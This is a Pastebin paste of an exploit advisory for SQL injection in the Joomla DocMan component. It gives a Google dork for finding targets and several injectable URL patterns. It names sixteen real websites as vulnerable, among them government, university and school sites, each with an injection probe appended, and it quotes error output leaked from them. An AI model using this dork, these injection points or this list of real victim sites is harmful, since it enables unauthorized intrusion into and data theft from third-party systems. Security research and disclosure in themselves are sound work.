KingSkrupellos

Joomla DocMan Components 3.3.4 SQL Injection

Feb 3rd, 2019
99
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.68 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla DocMan Components 3.3.4 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 04/02/2019
  7. # Vendor Homepage : joomlatools.com
  8. # Software Information/Download Link : joomlatools.com/extensions/docman/
  9. # Software Version : 3.3.4 and previous versions.
  10. # Tested On : Windows and Linux
  11. # Category : WebApps
  12. # Exploit Risk : Medium
  13. # Google Dorks : inurl:''/index.php?option=com_docman''
  14. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  15. Special Elements used in an SQL Command ('SQL Injection') ]
  16. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  17. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  18. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  19.  
  20. ####################################################################
  21.  
  22. # Description about Software :
  23. ***************************
  24. According to the JoomlaTools - It is the best document & download manager extension for Joomla.
  25.  
  26. ####################################################################
  27.  
  28. # Impact :
  29. ***********
  30. Joomla DocMan 3.3.4 component for Joomla and other versions is prone to an SQL-injection
  31.  
  32. vulnerability because it fails to sufficiently sanitize user-supplied
  33.  
  34. data before using it in an SQL query.
  35.  
  36. Exploiting this issue could allow an attacker to compromise the application,
  37.  
  38. access or modify data, or exploit latent vulnerabilities in the underlying database.
  39.  
  40. A remote attacker can send a specially crafted request to the vulnerable application
  41.  
  42. and execute arbitrary SQL commands in application`s database.
  43.  
  44. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  45.  
  46. An attacker can exploit this issue using a browser.
  47.  
  48. ####################################################################
  49.  
  50. # SQL Injection Exploit :
  51. **********************
  52.  
  53. /index.php?option=com_docman&task=cat_view&Itemid=[SQL Injection]
  54.  
  55. /index.php?option=com_docman&task=doc_download&gid=[ID-NUMBER]&Itemid=[SQL Injection]
  56.  
  57. /index.php?option=com_docman&task=doc_view&gid=[SQL Injection]
  58.  
  59. /index.php?option=com_docman&task=doc_details&gid=[ID-NUMBER]&Itemid=[SQL Injection]
  60.  
  61. /index.php?option=com_docman&task=cat_view&gid=[ID-NUMBER]&limit=[ID-NUMBER]&order=date&dir=[SQL Injection]
  62.  
  63. /index.php?option=com_docman&task=cat_view&gid=[ID-NUMBER]&Itemid=[SQL Injection]
  64.  
  65. /index.php?option=com_docman&task=cat_view&gid=[ID-NUMBER]&limit=[ID-NUMBER]&limitstart=[ID-NUMBER]&order=name&dir=DESC&Itemid=[SQL Injection]
  66.  
  67. /index.php?option=com_docman&task=cat_view&gid=[ID-NUMBER]&limit=[ID-NUMBER]&limitstart=[ID-NUMBER]&order=date&dir=ASC&Itemid=[SQL Injection]
  68.  
  69. ####################################################################
  70.  
  71. # Example Vulnerable Sites :
  72. *************************
  73. [+] consolemarcello.gov.it/vecchiosito/index.php?option=com_docman&task=doc_download&gid=3018&Itemid=794%27
  74.  
  75. [+] iccrucoli.gov.it/old/index.php?option=com_docman&task=doc_download&gid=181&Itemid=19%27
  76.  
  77. [+] projetos.santana.ifsul.edu.br/portal_santana/index.php?option=com_docman&task=doc_download&gid=1292&Itemid=1%27
  78.  
  79. [+] uonbi.ac.ke/projects/ecajournal/index.php?option=com_docman&task=doc_download&gid=277&Itemid=27%27
  80.  
  81. [+] ncd.org.jo/ar/index.php?option=com_docman&task=doc_download&gid=113&Itemid=79%27
  82.  
  83. [+] iccembra.it/joomla/index.php?option=com_docman&task=cat_view&gid=362&Itemid=325%27
  84.  
  85. [+] ordine.chimiciveneto.it/index.php?option=com_docman&task=cat_view&Itemid=66%27
  86.  
  87. [+] lnx.scuolaforal.org/poloartigianato/index.php?option=com_docman&task=doc_details&gid=34&Itemid=96%27
  88.  
  89. [+] pwzps.p9.pl/index.php?option=com_docman&task=cat_view&gid=103&Itemid=56%27
  90.  
  91. [+] mail.kicukiro.gov.rw/index.php?option=com_docman&task=cat_view&gid=75&limit=5&limitstart=0&order=name&dir=DESC&Itemid=48%27
  92.  
  93. [+] economiedubenin.org/index.php?option=com_docman&task=doc_details&gid=463&Itemid=1%27
  94.  
  95. [+] yunn.yu.edu.jo/index.php?option=com_docman&task=doc_details&gid=93&Itemid=74%27
  96.  
  97. [+] seamen.it/index.php?option=com_docman&task=cat_view&gid=44&limit=5&order=date&dir=1%27
  98.  
  99. [+] duratec.de/info/index.php?option=com_docman&task=doc_view&gid=168%27
  100.  
  101. [+] mundoplanet.cl/index.php?option=com_docman&task=cat_view&gid=9&limit=5&limitstart=0&order=date&dir=ASC&Itemid=3%27
  102.  
  103. [+] gastroback.de/index.php?option=com_docman&task=doc_download&gid=57&Itemid=50%27
  104.  
  105. ####################################################################
  106.  
  107. # Example SQL Database Error :
  108. ****************************
  109. Strict Standards: Non-static method JLoader::import() should
  110. not be called statically in /web/htdocs/www.iccembra.it
  111. /home/joomla/libraries/joomla/import.php on line 29
  112.  
  113. Strict Standards: Non-static method mosCache::getCache() should not be
  114. called statically in /web/htdocs/www.scuolaforal.org/home
  115. /poloartigianato/includes/frontend.php on line 133
  116.  
  117. Strict Standards: Non-static method modules_html::module()
  118. should not be called statically in /web/htdocs/www.scuolaforal.org
  119. /home/poloartigianato/includes/frontend.php on line 174
  120.  
  121. Strict Standards: Non-static method modules_html::
  122. modoutput_rounded() should not be called statically in
  123. /web/htdocs/www.scuolaforal.org/home/poloartigianato
  124. /includes/frontend.html.php on line 54
  125.  
  126. Strict Standards: Non-static method modules_html::CustomContent()
  127. should not be called statically in /web/htdocs/www.scuolaforal.org
  128. /home/poloartigianato/includes/frontend.html.php on line 395
  129.  
  130. ####################################################################
  131.  
  132. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  133.  
  134. ####################################################################
Add Comment
Please, Sign In to add comment